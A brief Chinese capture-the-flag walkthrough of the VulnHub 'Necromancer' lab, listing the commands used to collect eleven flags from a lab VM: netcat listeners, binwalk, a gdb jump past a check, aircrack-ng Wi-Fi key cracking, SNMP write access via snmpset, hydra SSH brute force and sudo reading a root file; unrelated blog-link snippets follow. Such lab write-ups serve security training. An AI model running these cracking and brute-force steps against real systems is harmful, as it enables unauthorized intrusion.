vulnhub Necromancer wp
flag1
nmap -sU -T4 192.168.220.130 有666端口
nc -nvu 192.168.220.130 666 监听回显消息
tcpdump host 192.168.220.130抓包查看发现有到4444端口的流量
nc -nvlp 4444 监听发现字符串,解码后得到flag1
flag2
根据flag1的解码字符串提示,在监听666端口时输入opensesame,得到flag2
flag3
访问80端口,下载图片binwalk查看,是个压缩包,dd或者直接改后缀名解压缩,得到flag3
flag4
谷歌搜索提示magic items wiki将网站内容制作为字典爆破目录(连不上google失败),得到tailsman文件
cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v
修改权限为777,执行没有结果
debug
gdb ./tailsman
info functions
break wearTalisman #穿衣服时打断点
run
jump chantToBreakSpell #跳到断点,得到flag4
flag5
flag4为md5,解密为blackmagic,根据flag监听31337
nc -nvu 192.168.220.130 31337
输入blackmagic得到flag5
flag6
flag5提示/thenecromancerwillabsorbyoursoul/
访问得到flag6
flag7
thenecromancerwillabsorbyoursoul界面的图片链接点击后下载得到压缩包,解压后为pcap,协议为802.11,所以是无线网络
aircrack-ng破解
aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt
得到key death2all
snmp-check -c death2all -v 1 -t 1 192.168.220.130 #查看到flag7
snmpwalk -v 2c -c death2allrw 192.168.220.130 #查看OID
snmpset -c death2allrw -v 1 192.168.220.130 iso.3.6.1.2.1.1.6.0 s Unlocked #根据OID解锁
snmp-check -c death2all -v 1 192.168.220.130
flag8、9、10
flag7的md5为demonslayer,且显示22端口,尝试爆破密码
hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 192.168.220.130 ssh
得到密码12345678,ssh连接有个flag8文件
根据提示监听777端口
nc -u localhost 777,敲击回车两次,之后根据谷歌得到的答案回答得到flag8、9、10
flag11
ctrk+c返回,ls -al查看有.smallvile文件,打开没有线索
sudo -l查看有/bin/cat 和/root/flag11.txt
执行sudo /bin/cat /root/flag11.txt,结束
vulnhub Necromancer wp的更多相关文章
- Vulnhub 靶场 Os-hackNos WP
About Os-hackNos 描述 Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learn ...
- Vulnhub 靶场 Dijnn WP
About djinn: 1 描述 难度级别:中等 Flag:user.txt和root.txt 说明:该计算机是VirtualBox以及VMWare兼容的.DHCP将自动分配IP.您将在登录屏幕上看 ...
- Vulnhub靶场DC-1 WP
前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...
- Vulnhub靶场 DC-2 WP
DC-2简介 描述 与DC-1一样,DC-2是另一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验. 与原始DC-1一样,它在设计时就考虑了初学者. 必须具备Linux技能并熟悉Linux命 ...
- Vulnhub系列——持续更新
vulnhub系列--持续更新 一 · XXE Lab: 1 使用vmware搭建靶机 扫描存活主机 找到目标主机--192.168.1.18 开始扫描目标端口 发现只开了一个80 ...
- vulnhub靶场之LOOZ: 1
准备: 攻击机:虚拟机kali.本机win10. 靶机:looz: 1,下载地址:https://download.vulnhub.com/looz/Looz.zip,下载后直接vbox打开即可. 知 ...
- vulnhub靶场之VULNCMS: 1
准备: 攻击机:虚拟机kali.本机win10. 靶机:VulnCMS: 1,下载地址:https://download.vulnhub.com/vulncms/VulnCMS.ova,下载后直接vb ...
- Vulnhub 靶场 LOOZ: 1
Vulnhub 靶场 LOOZ: 1 前期准备: 靶机地址:https://www.vulnhub.com/entry/looz-1,732/ kali攻击机ip:192.168.147.190 靶机 ...
- 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])
常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...
- wp已死,metro是罪魁祸首!
1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...
随机推荐
- Selenium 高亮显示操作元素
一.代码 使用 https://www.cnblogs.com/TSmagic/p/16595168.html 此篇代码即可 二.编辑 test_ys_case.py 文件 # coding=utf- ...
- 【解决办法】配置banner信息时卡死/无反应,以及正确配置
环境: 工具:锐捷EVE模拟器 远程工具:SecureCRT 系统版本:Windows 10 问题描述 描述:在配置登录 banner 提示警告信息时,将 "^" 符号放到了警告信 ...
- .NET Core 离线生成 Tron 波场私钥和地址笔记
NuGet 引入依赖库 PM> Install-Package Tron.Wallet.Net 随机生成私钥和对应的地址 using Tron.Wallet.Net; namespace Con ...
- 音视频八股文(4)--ffmpeg常见命令(3)
17 FFmpeg滤镜 17.1 filter的分类 按照处理数据的类型,通常多媒体的filter分为: ● 音频filter ● 视频filter ● 字幕filter 另一种按照处于编解码器的位置 ...
- 2021-04-18:给定一个二维数组matrix,里面的值不是1就是0,上、下、左、右相邻的1认为是一片岛,返回matrix中岛的数量。
2021-04-18:给定一个二维数组matrix,里面的值不是1就是0,上.下.左.右相邻的1认为是一片岛,返回matrix中岛的数量. 福大大 答案2021-04-18: 并查集. 代码用gola ...
- 【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
问题描述 当使用Azure Redis服务时,需要把一个Redis服务的数据导入到另一个Redis上,因为Redis服务没有使用高级版,所以不支持直接导入/导出RDB文件. 以编程方式来读取数据并写入 ...
- jq如何将获取到的css属性值变为int类型
情况 小王:诶诶诶?我用js中css方法获取到的属性值怎么判断错误了呀?怎么办怎么办? Allen:害,小王,你是不是没有注意左右两边的类型,会不会是数据类型不一致导致的? 事故现场: if($(&q ...
- springboot 多环境配置及配置文件的位置
了解即可
- 微软Build 2023两大主题:Copilots和插件
在本周大型微软人工智能 2023 开发者大会的开幕式上,人工智能站到了舞台中央--前台和后台以及介于两者之间的所有舞台. 贯穿会议的两个主要主题是Copilots - 涵盖广泛产品和服务的AI助手 - ...
- 有管django使用orm 字段报错问题
直接删除表,重新生成,首先删除:migrations 中,上传记录,然后django_migrations,